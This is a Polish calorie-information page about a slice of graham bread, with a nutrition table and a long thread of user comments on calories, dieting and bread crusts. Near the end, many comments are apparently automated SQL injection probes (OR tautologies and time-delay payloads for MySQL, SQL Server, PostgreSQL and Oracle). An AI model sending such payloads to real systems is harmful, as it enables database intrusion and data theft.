Chleb graham

Kromka chleba graham waży 30g.

  100g na zdjęciu (30 g)
Energia 231 kcal 69 kcal
Białko 8,9 g 2,7 g
Tłuszcz 1,7 g 0,5 g
Kwasy tłuszczowe nasycone 0,3 g 0,1 g
Węglowodany 42,3 g 12,7 g
Błonnik 6,4 g 1,9 g
Sól 1,1 g 0,3 g

Chleb graham kalorie w 100g: 231kcal

Zobacz więcej: sztuka chleb 30g graham

Ostatnia aktualizacja: 2024.08.19

Ważenie dodano: 2010.01.26 w kategorii Produkty zbożowe

Dzienne zapotrzebowanie

Porcja ze zdjęcia dla 2000 kcal
pokaż dla mojego zapotrzebowania


Mamy 103 opinie na temat ważenia - napisz własną

  • a jakiej firmy jes ten chleb?
  • Izabela[autor ilewazy.pl] 2010/07/12 10:17
    Chleb został zakupiony w pobliskiej piekarni, a wartości pochodzą z następującego źródła danych:
    Tabele składu i wartości odżywczych żywności.
    Kunachowicz Hanna, Nadolna Irena, Przygoda Beata, Iwanow Krystyna
    Wydawnictwo Lekarskie PZWL Warszawa 2005
  • jesli mialabym wybierac miedzy zwyklym chlebem a grahamem wybralabym graham, ale co myslec jesli chodzi o inne chleby? jaki jesc zeby nie dostarczac "pustych kalorii"? Co pani mysli o tym pani Izabelo, albo pan, panie Macieju?
  • Patrycja 2011/01/27 19:04
    Taka malutka, a taka kaloryczna. Mam to szczęście, że większość pieczywa bezglutenowego zawiera mniejszą ilość kcal. Choć trzeba przyznać, że ten chleb jest na pewno smaczniejszy.
  • 66 kcal to dużo?!
  • "Dega" spójrz na komentarze przy mandarynce,dopiero sie załamiesz.. eech mam wrażenie,że niektórzy celowo wpędzają się w zaburzenia :( szkoda,że nie wiedzą jakie sa ich skutki
    przeraszam za off topic,ale sama cierpiałam przez to strasznie i po prostu nie potrafię zrozumieć,po co ktoś sam sobie stwarza problemy?!
  • Patrycja 2011/01/27 20:48
    Jak na taką małą kromkę to dużo. Większa kromka chleba słonecznikowego bezglutenowego ma około 43 kcal.
  • Patrycja 2011/01/27 20:49
    Choć właściwie teraz spojrzałam, że ta jest cięższa, lecz wizualnie wydaje się być mniejsza.
  • Faktycznie, komentarze pod mandarynką są równie "inteligentne". Szkoda, że taka fajna i pomocna strona została zdominowana przez osoby pragnące ważyć 20kg i uważające, że 27kcal to dużo.
  • mam dziwne pytanie: ile moze miec kcal skorka od chleca cala? niestety nie wiem czemu obgryzam vhleb:)
  • Mademoiselle 2011/03/14 10:47
    też obgryzam skórkę.. :S
  • malinowadżasta 2011/04/15 19:19
    skórki są najlepsze <3
  • Jak byłam mała to tez lubialam skórki. Ale kiedyś mi kuzyn powiedział, ze jak będę je jeść to będę "cycata" ;) strasznie mnie tym znartwil i od tamtej pory ani razu nie tknelam skórki... Dopiero jak byłam już w lo koleżanka spytała mnie czemu wyrzucam skórki, jak sie pochwalilam powodem to dostałam krótka piłkę - i ty w to uwierzylas?... Dopiero wtedy sobie uświadomiłam, ze rzeczywiście skórki na rozmiar biustu nie mogą mieć wpływu :P a do tamtego czasu strasznie sie bałam ze mi w ten sposób zaszkodzą :P
  • Mademoiselle 2011/04/16 11:31
    ha! to już wiem, czemu jestem taka płaska :D
  • czy to jest chleb wieloziarnisty?
  • hmm123 nie, on jest tylko pszenny, ale bardzo zdrowy i pyszny. swiezutkie kromki sa bardzo pyszne, miekkie i delikatne
  • ile ma kalori ma kromka chleba wiloziarnistego?
  • pewnie podobnie, ale wszystko zalezy od zwartosci chleba i wielkosci kromki
  • piotrtom 2011/12/19 21:16
    Ludzie!! W chlebie głównie chodzi o to żeby jeść razowy albo pełnoziarnisty bo jest on żródłem tzn weglowodanów długowchłanialne... Wszystko co robione z białej mąki jest złe (powiedzmy) bo posiada duzą ilość węglowodanów szybkowchłanialnych... Przy czym chleba razowego automatycznie trzeba zjeść mniej by się najeść oraz długo utrzymuje poczucie sytości bo węglowodany się trawią powoli i równomiernie...Roztrząsanie czy kromka ma 5 kalorii wiecej czy mniej jest bezsensem, chodzi głównie o typ mąki z której jest robiony chleb... Jeśli się je chleb razowy lub pełnoziarnisty w granicach rozsądku i zachowuje zasadę wydatek energetyczny minus 500kcal dziennie to się chudnie z oczach... Pozdrawiam
  • serduszko 2012/04/21 11:00
    ja mam w domu chleb graham z ziarnami , iczy kalorycznośc tego chleba bedzie taka sama lub zbliżona do tego tutaj przedstawionego ??

    Ps. jhaki chleb jest lepiej jeśc na diecie odchudzającej graham z ziarnami czy żytni na zakwasie ?? prosze o odpowiedz ;)
  • Izabela[autor ilewazy.pl] 2012/04/23 16:59
    @serduszko: "ja mam w domu chleb graham z ziarnami , i czy kalorycznośc tego chleba bedzie taka sama lub zbliżona do tego tutaj przedstawionego ??" Myślę, że będzie zbliżona. Gdyby ziaren było bardzo dużo, wpłynie to nieznacznie na podwyższenie wartości białka i tłuszczu oraz błonnika (a tym samym kcal).

    "Ps. jaki chleb jest lepiej jeśc na diecie odchudzającej graham z ziarnami czy żytni na zakwasie ??"
    Według mnie, dieta = styl życia. Czyli powinno się spożywać podczas jej trwania większość takich produktów, które będzie się konsumowało przez kolejne lata funkcjonowania. Dlatego nie ma przeciwwskazań do pieczywa podczas redukcji masy ciała, ale należy zwrócić uwagę by optymalnie było to pieczywo z mąki pełnoziarnistej lub razowej, a także dopasować jogo ilość do aktualnego stanu organizmu.

    W prawidłowym odżywianiu się, ważne jest urozmaicenie, dlatego polecam różne rodzaje pieczywa.
    Poniżej przedstawiam kilka propozycji, które warto spożywać zamiennie (kolejność podana przez mnie przypadkowa):
    http://www.ilewazy.pl/kromka-pumpernikla
    http://www.ilewazy.pl/kromka-chleba-graham
    http://www.ilewazy.pl/kromka-chleba-lorenca
    http://www.ilewazy.pl/kromka-chleba-z-sezamem
    http://www.ilewazy.pl/kromka-chleba-orkiszowego
    http://www.ilewazy.pl/kromka-chleba-z-ziarnami-soi
    http://www.ilewazy.pl/kromka-chleba-ze-slonecznikiem
    http://www.ilewazy.pl/kromka-chleba-z-siemieniem-i-otrebami
    http://www.ilewazy.pl/kromka-chleba-zytniego-wysokoblonnikowego-z-otrebami
  • goska1813 2012/08/27 21:56
    a ja w swojej okolicy mam możliwośc zakupienia takiego chleba ale jego skład wygląda tak: mąka pszenna graham typ 1850 i mąka pszenna typ 720, sól, drożdze . Czy będąc na diecie mogę spożywav taki chleb?? Wartość kaloryczna jednej kromki będzie podobna jak tej na zdjeciu??
  • Może to niezbyt przyjemny temat, miejsce może i też, ale z drugiej strony, właśnie tu według mnie powinnam to opublikować.
    Do wszytskich, którzy na diecie nabawili się wiatrów.
    Kochani, radzę odstawić wszystkie chleby gracham, dodawanie otrębów, jedzenie dużej ilosci jabłek, śliwe etc., ale przede wszytskim ten pełnoziarniste piczywo, naprawdę. Podczas odchudzenia nasza przmienana materii zazwyczaj się spowalnia i taka nagła niespodzianka wytworzonych gazów (za sprawą tych produktów) jest.. niefajna w skutkach. Ciekawa jestem również opinii Ekspertów na te temat :). Ja zrezygnowałam i jest ok ;].
  • Weronika 2013/03/18 23:22
    Wiatry i wzdęcia w diecie spowodowane są często ciężkim pieczywem żytnim, zaleca się spożywanie chleba pszennego typu graham lub delikatnego pszennego razowego. Duża ilość błonnika - otrębów, owoców i warzyw wzdymających (jabłka, winogrona,śliwki,kapusta,cebula,brukselka,fasola,groch...) powinna być optymalnie zmniejszona, lecz nadal uzupełniana jako źródło z warzyw delikatnych jak pomidor, ogórek, pietruszka, oraz dojrzałych lekkich owoców np. truskawek lub cięższych lecz niewzdymających jak banany :)
  • Witam Serdecznie

    Czy mogłaby prosić o SKŁAD tego chleba ? Chciałabym wiedzieć jak to wygląda, ponieważ robię sama swój domowy chleb graham, a nie potrafię sobie wyliczyć ile kalorii przyda na kromkę. Dodam, że mój chleb to 0,5 kh mąki graham czyli typ 1850, 1 łyżeczka soli, 7 g drożdży suchy i 450 ml wody. Z góry dziękuje.
  • @KlaudiaW najpierw policz wartości składników do tego chleba mąka itd. i masz cały bochenek, potem pokrój go na kromki i podziel liczbę kromek przez liczbę kcal całego bochenka i wyjdzie ci kcal 1 kromki.
  • Izabela[autor ilewazy.pl] 2013/08/28 21:58
    @KlaudiaW: "Czy mogłaby prosić o SKŁAD tego chleba ?" Wartości pochodzą ze źródła podanego w tym komentarzu: http://www.ilewazy.pl/kromka-chleba-graham#komentarz-8084
    W owym źródle nie ma podanych informacji odnośnie składu. W chwili obecnej na rynku można spotkać chleby graham o różnym składzie. W jednych przeważa mąka graham (a następnie pszenna jasna - oczyszczona), w drugich na odwrót, w kolejnych używa się wyłącznie mąki graham...
    Natomiast jeżeli chodzi o obliczanie wartości dla domowego pieczywa, zachęcam do zapoznania się z treścią poniższych komentarzy - mam nadzieję, że rozwieją Twoje wątpliwości
    http://www.ilewazy.pl/chleb-zytni-razowy#komentarz-5050 (pytanie użytkowniczki)
    http://www.ilewazy.pl/chleb-zytni-razowy#komentarz-5051 (odpowiedź Macieja)
  • A czy chleb pełnoziarnisty z ziarnami na maślance będzie miał podobne kalorie ?
  • Izabela[autor ilewazy.pl] 2013/09/10 13:35
    @Martha: żeby odpowiedzieć na to pytanie, należałoby znać skład i proporcje poszczególnych składników. Aby jednak nie zaprzątać sobie głowy kaloriami, proponuję szacować z powyższego chleba.
  • Zastanawiam sie, który chleb bedzie bardziej odpowiedni do diety odchudzającej. Orkiszowy czy graham ?
  • Chleb graham jest oczywiście zdrowy i dobry , ale co do "konsystencji" to jest dość delikatny, rozpadające. Bułka grahamka to chociaż trzyma się jakoś "kupy" :) Bardziej odpowiada mi razowy czy wieloziarnisty jest po prostu bardziej zwarty :)
  • A jakie wartości będzie miał chleb tostowy graham z biedronki? Bo spotkalam sie z rozbieżnościami.
  • Izabela[autor ilewazy.pl] 2015/05/10 12:23
    @niebieskooka: To zależy, z jakiej receptury zostanie sporządzony.
    Może się okazać, że Biedronka ma podpisaną umowę z różnymi producentami - stąd różnice w wartościach. Nie wydaje mi się, żeby to były duże rozbieżności. Warto wiedzieć, że nawet wartości przedstawione od jednego producenta, mogą się nieco od siebie różnić w różnych partiach. I to nie jest jakaś nadzwyczajna sytuacja. Do oszacowania wartości może również służyć powyższe ważenie.
  • Izabela[autor ilewazy.pl] 2015/05/10 12:25
    @Anita: Warto wykorzystywać zamiennie w menu zarówno chleb orkiszowy z mąki razowej, jak i graham.
  • W jakiej piekarni został zakupiony powyższy chleb?
  • Chciałabym się dowiedzieć, dlaczego bułka grahamka w 100g ma 252 kcal, a chleb graham mniej? Od czego to zależy? Przecież to i to graham!
  • Izabela[autor ilewazy.pl] 2015/11/11 15:37
    @wiecznie_glodna: Ważenie było wykonywane ponad 5 lat temu. Nie pamiętam, w której piekarni został zakupiony chleb.
    "Chciałabym się dowiedzieć, dlaczego bułka grahamka w 100g ma 252 kcal, a chleb graham mniej?"
    Różnica wynika z ilościowego składu surowcowego (receptura).
    Wartość 221 a 252 jest zbliżona. Nie ma sensu zajmować się tego typu analizami. Ostatecznie nie wiesz dokładnie, ile energii z takiej bułki czy chleba przyswoi Twój organizm.
    Poza tym, gdybyś porównała w kalorymetrze 10 grahamek od różnych producentów, najprawdopodobniej nie uzyskałabyś 2 identycznych wartości liczbowych.
    Warto szacować i zastanawiać się nad tym, co wkłada się do przewodu pokarmowego, a nie zastanawiać się nad niewielką różnicą kcal między produktami.
  • @wiecznie_glodna a wiesz ze kilka dni temu stojąc w kolejce w piekarni tez o tym myślałam? od razu to sobie wyjaśniłam(chociaż bez żadnych podstaw popartymi badaniami ;) ) że bułka ma więcej "skórki" niż chleb.i może przez to jest bardziej kaloryczna...hi hi ....ps.i tak kupiłam grachamkę...z jednej wychodzi mi 6 kromeczek a to już wygląda lepiej na talerzu niż 2 kromki chleba.
  • mam wrażenie, że bułki grahamki są żarliwiej dosładzane przez piekarzy
  • Olcia,czy to oznacza,że skórka jest baedziej kalloryczna niz wnętrze?
  • @MalyKsiaze ....to są tylko moje hmmm przemyślenia .... nie jest to poparte żadnymi badaniami ;o)
  • jakos nigdy nie zastanawialam sie tak wnikliwie nad kalorycznoscia pieczywa, ale nie sadze zeby skorka miala znaczenie przy obliczaniu wartosci, chyba ze brac pod uwage, ze skorka jest po prostu bardziej wyschnieta. cale bulki sa bardziej wyschniete niz chleb, w chlebie w 100g bedzie wiecej wody, dlatego moze wyjsc "mniej kaloryczny".
  • bo ja potrafie zjesc skórkę chleba [świeżego domowego chrup[kiego] a srodek zostawic :D jak mysz !
  • @MalyKsiaze hahah, mam to samo! Uwielbiam skubać taki świeży chleb... :D
  • @pastelova i co myslisz o jego kaloryczności ?
  • wiecznie_głodna 2015/11/15 17:28
    Czy jeśli chleb jest posypany mąką (zwykłą, białą, dość gruba warstwa) to to wpływa na jego kaloryczność?
  • Izabela[autor ilewazy.pl] 2015/11/15 19:05
    @wiecznie_głodna: Tak, wpływa. Jednak biorąc pod uwagę fakt, że na kromkę przypada mimo wszystko wagowo niewiele tej mąki, dodatkowa wartość kcal będzie niewielka.
  • @MalyKsiaze jakoś nigdy się nad tym nie zastanawiałam... Nawet jeśli różni się kaloryczności to na pewno w niewielkim stopniu. Raczej to nie jest coś nad czym będę skrupulatnie myśleć ;)
  • pastelova- heh, no ja mysle, bo potrafie caly bochenek od gory i od dołu poobgryzac :D
  • Gdyby ktos szukal wiecej informacji o tym chlebie tutaj jest fajnie opisany.
    https://www.piekarniakozielski.pl/pieczywo/graham-szefa
  • 555
  • 555
  • 555
  • 555RuAqhy73
  • 555
  • -1 OR 2+82-82-1=0+0+0+1 --
  • -1 OR 2+141-141-1=0+0+0+1
  • -1' OR 2+53-53-1=0+0+0+1 --
  • -1' OR 2+505-505-1=0+0+0+1 or 'SATn04Au'='
  • -1" OR 2+497-497-1=0+0+0+1 --
  • 555*if(now()=sysdate(),sleep(15),0)
  • 5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
  • 5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
  • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  • 555-1; waitfor delay '0:0:15' --
  • 555-1); waitfor delay '0:0:15' --
  • 555-1 waitfor delay '0:0:15' --
  • 555nVE3xGsc'; waitfor delay '0:0:15' --
  • 555-1 OR 408=(SELECT 408 FROM PG_SLEEP(15))--
  • 555-1) OR 444=(SELECT 444 FROM PG_SLEEP(15))--
  • 555-1)) OR 547=(SELECT 547 FROM PG_SLEEP(15))--
  • 5558bGrJpn4' OR 487=(SELECT 487 FROM PG_SLEEP(15))--
  • 555FdcxE3NT') OR 189=(SELECT 189 FROM PG_SLEEP(15))--
  • 555WOugUXTc')) OR 266=(SELECT 266 FROM PG_SLEEP(15))--
  • 555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  • 555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  • 555
  • 555'"
  • 555%2527%2522'"
  • @@0OPGp
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555
  • 555

Dodaj komentarz na temat ważenia

Oceń smak i właściwości produktu. Podziel się ciekawym przepisem, napisz jak wykorzystujesz go w kuchni. Jeśli produkt jest dla Ciebie nowością nie krępuj się pytać o sposób przyrządzania czy dostępność.

Możesz dodać komentarz jako niezalogowany lub zaloguj się albo zarejestuj aby w pełni korzystać z ileważy.pl

Zobacz jakie są zalety rejestracji przy komentowaniu

Jakie są zalety rejestracji przy komentowaniu?

  • powiąż komentarze z Twoim kontem użytkownika
  • nie czekaj na moderację komentarzy
  • zarezerwuj swój podpis / pseudonim
  • podstawowe konto jest darmowe a rejestracja trwa ok. minutę